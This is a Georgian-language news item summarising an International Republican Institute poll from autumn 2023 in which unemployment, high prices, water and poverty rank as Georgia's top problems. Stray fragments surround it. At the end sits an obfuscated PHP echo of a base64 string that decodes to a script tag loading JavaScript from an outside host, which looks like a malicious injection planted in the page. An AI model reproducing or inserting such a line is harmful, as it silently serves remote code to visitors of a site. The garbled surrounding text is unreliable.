celsiusi
ავერსი შნაიდერი

 საერთაშორისო რესპუბლიკური ინსტიტუტის (IRI) კვლევის მიხედვით, გამოკითხულთა უმრავლესობამ ქვეყნის ყველაზე მნიშვნელოვან პრობლემად ეკონომიკური საკითხები დაასახელეს, როგორიცაა უმუშევრობა, მაღალი ფასები და სხვა ზოგადი ეკონომიკური პრობლემები, წყალი და სიღარიბე.

სწორედ ეს პრობლემები დგას რეიტინგში პირველ ხუთეულში. აქედან უმუშევრობის პრობლემა როგორც პირველად, ასევე მეორეულ პასუხად გამოკითხულთა 55%-მა დაასახელა, ცხოვრების ღირებულება და მაღალი ფასები კი ჩართული რესპონდენტების 39%-ისთვის წარმოადგენს სირთულეს, სხვა ეკონომიკურ ფაქტორებს 26%, წყალს - 17%, სიღარიბეს კი რესპონდენტების 13% ასახელებს.

პირველ ხუთეულს მოსდევს განათლება, პოლიტიკური პოლარიზაცია, გარე კონფლიქტები და ომი, ასევე ჯანდაცვა და დაუცველობა მოსდევს. გამოკითხულთა მხოლოდ 2 პროცენტი მიიჩნევს, რომ პრობლემას დღევანდელი ხელისუფლება წარმოადგენს. რესპონდენტთა ნაწილი კი შიდა კონფლიქტებს, მათ შორის ეთნიკურ და რელიგიურს ასახელებს.

IRI-ს მიერ 15 ნოემბერს გამოქვეყნებული კვლევის შედეგები 2023 წლის 14 სექტემბრიდან 14 ოქტომბრის პერიოდში ჩატარებულ გამოკითხვას ასახავს. კვლევა პირისპირ ინტერვიუს გზით წარიმართა და საარჩევნო ხმის უფლებისა და ასაკის მქონე 1200 რესპონდენტი იყო ჩართული. კვლევის შედეგების ცდომილება +/- 2.5 %-ია. გამოპასუხების მაჩვენებელი კი 73%-ია.

592
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");